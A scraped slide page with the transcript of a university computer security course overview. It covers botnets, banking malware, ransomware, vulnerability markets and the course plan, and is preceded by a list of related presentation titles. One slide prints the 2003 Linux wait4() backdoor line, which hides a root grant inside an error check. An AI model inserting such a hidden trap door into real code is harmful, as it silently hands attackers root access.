Dan Boneh COM-260 Computer & Network Security Course overview.

Slides:



Advertisements
Similar presentations
Providing protection from potential security threats that exist for any internet-connected computer is termed e- security. It is important to be able to.
Advertisements

Thank you to IT Training at Indiana University Computer Malware.
Tips and tools to keep you and your information safe on-line. We will go over a lot of information today, so it is important to pay attention and follow.
ISRT IS 376 OCTOBER 28, 2014 INTERNET SECURITY THREAT REPORT  2014.
Parameter Tampering. Attacking the Ecommerce Shopping Cart In the above image we see that a user who wants to purchase a Television visits an online Store.
7 Effective Habits when using the Internet Philip O’Kane 1.
Copyright © 2006 by The McGraw-Hill Companies, Inc. All rights reserved. McGraw-Hill Technology Education Copyright © 2006 by The McGraw-Hill Companies,
#AVeSPresents AVeS Cyber Security Confidence in your Digital Information 2014/09/25 Charl Ueckermann Managing Director AVeS Cyber Security Lex Informatica.
Dan Boneh CS155 Computer Security Looking for undergrad research? Come see me!
Internet Security Awareness Presenter: Royce Wilkerson.
Welcome to EECS 354 Network Penetration and Security.
Cyber Security - Threats James Clement Network Specialist ETS: Communications & Network Services
Web server security Dr Jim Briggs WEBP security1.
Viruses, Hacking, and AntiVirus. What is a Virus? A type of Malware – Malware is short for malicious software A virus – a computer program – Can replicate.
Norman SecureSurf Protect your users when surfing the Internet.
CHC DI Group. What We Will Cover Securing your devices and computers. Passwords. s. Safe browsing for shopping and online banks. Social media.
資安新聞簡報 報告者:劉旭哲、曾家雄. Spam down, but malware up 報告者:劉旭哲.
Cyber crime on the rise. Recent cyber attacks How it happens? Distributed denial of service Whaling Rootkits Keyloggers Trojan horses Botnets Worms Viruses.
B OTNETS T HREATS A ND B OTNETS DETECTION Mona Aldakheel
Detrick Robinson & Amris Treadwell.  Computer viruses- are pieces of programs that are purposely made up to infect your computer.  Examples: › Internet.
Malware  Viruses  Virus  Worms  Trojan Horses  Spyware –Keystroke Loggers  Adware.
Staying Safe Online Keep your Information Secure.
Lesson 2- Protecting Yourself Online. Determine the strength of passwords Evaluate online threats Protect against malware/hacking Protect against identity.
IT security By Tilly Gerlack.
Malicious Attack Corporate Awareness and Walk through Date 29 September 2011.
CSE 4481 Computer Security Lab Mark Shtern. INTRODUCTION.
Architecture Planning and designing a successful system Use tried and tested techniques Easy to maintain Robust and long lasting.
IT internet security. The Internet The Internet - a physical collection of many networks worldwide which is referred to in two ways: The internet (lowercase.
Trojan Horses on the Web. Definition: A Trojan horse a piece of software that allows the user think that it does a certain task, while actually does an.
Security at NCAR David Mitchell February 20th, 2007.
Week 10-11c Attacks and Malware III. Remote Control Facility distinguishes a bot from a worm distinguishes a bot from a worm worm propagates itself and.
CSE 4481 Computer Security Lab Mark Shtern. INTRODUCTION.
Understanding Computer Viruses: What They Can Do, Why People Write Them and How to Defend Against Them Computer Hardware and Software Maintenance.
Financial Sector Cyber Attacks Malware Types & Remediation Best Practices
Mark Shtern.  Our life depends on computer systems  Traffic control  Banking  Medical equipment  Internet  Social networks  Growing number of.
Cybersecurity Test Review Introduction to Digital Technology.
Cyber Security – The Changing Landscape Erick Weber Department of Public Works Khaled Tawfik Cyber Security.
©2016 Check Point Software Technologies Ltd. 1 Latest threats…. Rolando Panez | Security Engineer RANSOMWARE.
Stuff to memorise… "A method tells an object to perform an action. A property allows us to read or change the settings of the object."
CURRENT STATUS OF CYBERCRIME  Security is the fastest growing service in IT  Cyber Crime Costs $750 Billion annually  70% of threats arrive via .
Common System Exploits Tom Chothia Computer Security, Lecture 17.
Technical Implementation: Security Risks
Botnets A collection of compromised machines
IT Security Awareness Day October 19, 2016
Mark Ryan Professor of Computer Security 25 November 2009
What they are and how to protect against them
Edexcel GCSE Cyber security threats Computer Science 1CP1
Computer Security CS155 Course overview
ISYM 540 Current Topics in Information System Management
Overview 1. Phishing Scams
Authentication 2.0: User Generated Security
Phishing is a form of social engineering that attempts to steal sensitive information.
Protect Your Computer Against Harmful Attacks!
Botnets A collection of compromised machines
Across the world McAfee providing the update protection solutions to the computer users. As same to the error above, wait for few minutes and think some.
Across the world McAfee providing the update protection solutions to the computer users. As same to the error above, wait for few minutes and think some.
Across the world McAfee providing the update protection solutions to the computer users. As same to the error above, wait for few minutes and think some.
Across the world McAfee providing the update protection solutions to the computer users. As same to the error above, wait for few minutes and think some.
ACROSS THE WORLD MCAFEE PROVIDING THE UPDATE PROTECTION SOLUTIONS TO THE COMPUTER USERS. AS SAME TO THE ERROR ABOVE, WAIT FOR FEW MINUTES AND THINK SOME.
Computer Security CS155 Course overview
Stealing Credentials.
Risk of the Internet At Home
Intercept X for Server Early Access Program Sophos Tester
Internet Worm propagation
Malware March 26, 2018.
Staying safe on the internet
Computer Security CS155 Course overview
Computer Security CS155 Course overview
Presentation transcript:

Dan Boneh COM-260 Computer & Network Security Course overview

Dan Boneh The computer security problem Lots of buggy software Social engineering is very effective Money can be made from finding and exploiting vulns. A software vulnerability is a security flaw, glitch, or weakness found in software or in an operating system (OS) that can lead to security concerns. An example of asoftware flaw is a buffer overflow. 1.Marketplace for vulnerabilities 2.Marketplace for owned machines (PPI) 3.Many methods to profit from owned machines current state of computer security

Dan Boneh Lots of vulnerability disclosures (2015) source:

Dan Boneh Vulnerable applications being exploited Source: Kaspersky Security Bulletin 2015

Dan Boneh Mobile malware (Nov – Oct. 2014) date The rise of mobile banking Trojans (Kaspersky Security Bulletin 2014)

Dan Boneh Introduction Sample attacks

Dan Boneh Why own machines: 1. IP address and bandwidth stealing Attacker’s goal: look like a random Internet user Use the IP address of infected machine or phone for: Spam (e.g. the storm botnet) Spamalytics: 1:12M pharma spams leads to purchase 1:260K greeting card spams leads to infection Denial of Service: Services: 1 hour (20$), 24 hours (100$) Click fraud (e.g. Clickbot.a)

Dan Boneh Why own machines: 2. Steal user credentials and inject ads keylog for banking passwords, web passwords, gaming pwds. Example: SilentBanker (and many like it) Bank Malware injects Javascript Bank sends login page needed to log in When user submits information, also sent to attacker User requests login page Similar mechanism used by Zeus botnet Man-in-the-Browser (MITB)

Dan Boneh Lots of financial malware size: 3.5 KB spread via attachments also found on home routers Source: Kaspersky Security Bulletin 2015

Dan Boneh Users attacked: stats ≈ 300,000 users worldwide A worldwide problem Source: Kaspersky Security Bulletin 2015

Dan Boneh Why own machines: 3. Ransomware CryptoWall (2014-) targets Windows spread by spam s ≈ 200,000 machines in 2015 A worldwide problem.

Dan Boneh Why own machines: 4. Spread to isolated systems Example: Stuxtnet Windows infection ⇒ Siemens PCS 7 SCADA control software on Windows ⇒ Siemens device controller on isolated network More on this later in course

Dan Boneh Server-side attacks Financial data theft: often credit card numbers – Example: Target attack (2013), ≈ 140M CC numbers stolen – Many similar (smaller) attacks since 2000 Political motivation: – Aurora, Tunisia Facebook (Feb. 2011), GitHub (Mar. 2015) Infect visiting users

Dan Boneh Types of data stolen ( ) Source: California breach notification report, 2015

Dan Boneh Example: Mpack PHP-based tools installed on compromised web sites – Embedded as an iframe on infected page – Infects browsers that visit site Features – management console provides stats on infection rates – Sold for several 100$ – Customer care can be purchased, one-year support contract Impact: 500,000 infected sites (compromised via SQL injection) – Several defenses: e.g. Google safe browsing

Dan Boneh Insider attacks: example Hidden trap door in Linux (nov 2003) – Allows attacker to take over a computer – Practically undetectable change (uncovered via CVS logs) Inserted line in wait4() Looks like a standard error check, but … if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL; See:

Dan Boneh Many more examples Access to SIPRnet and a CD-RW: 260,000 cables ⇒ Wikileaks SysAdmin for city of SF government. Changed passwords, locking out city from router access Inside logic bomb took down 2000 UBS servers ⋮ Can security technology help?

Dan Boneh How companies lose data Source: California breach notification report, 2015 lost/stolen laptops malware/phishing insider attack insider error How do we have this data?

Dan Boneh Introduction The Marketplace for Vulnerabilities

Dan Boneh Marketplace for Vulnerabilities Option 1: bug bounty programs (many) Google Vulnerability Reward Program: up to $20K Microsoft Bounty Program: up to $100K Mozilla Bug Bounty program: $7500 Pwn2Own competition: $15K Option 2: Zero day initiative (ZDI), iDefense: $2K – $25K

Dan Boneh Example: Mozilla

Dan Boneh Marketplace for Vulnerabilities Option 3: black market Source: Andy Greenberg (Forbes, 3/23/2012 )

Dan Boneh Marketplace for owned machines Pay-per-install (PPI) services PPI operation: 1.Own victim’s machine 2.Download and install client’s code 3.Charge client Source: Cabalerro et al. ( spam bot keylogger clients PPI service Victims

Dan Boneh Marketplace for owned machines Source: Cabalerro et al. ( spam bot keylogger clients PPI service Victims Cost: US $ / 1000 machines Asia - 7-8$ / 1000 machines

Dan Boneh This course Goals: Be aware of exploit techniques Learn to defend and avoid common exploits Learn to architect secure systems

Dan Boneh This course Part 1: basics (architecting for security) Securing apps, OS, and legacy code Isolation, authentication, and access control Part 2: Web security (defending against a web attacker) Building robust web sites, understand the browser security model Part 3: network security (defending against a network attacker) Monitoring and architecting secure networks. Part 4: securing mobile applications

Dan Boneh Don’t try this at home !

Dan Boneh Ken Thompson’s clever Trojan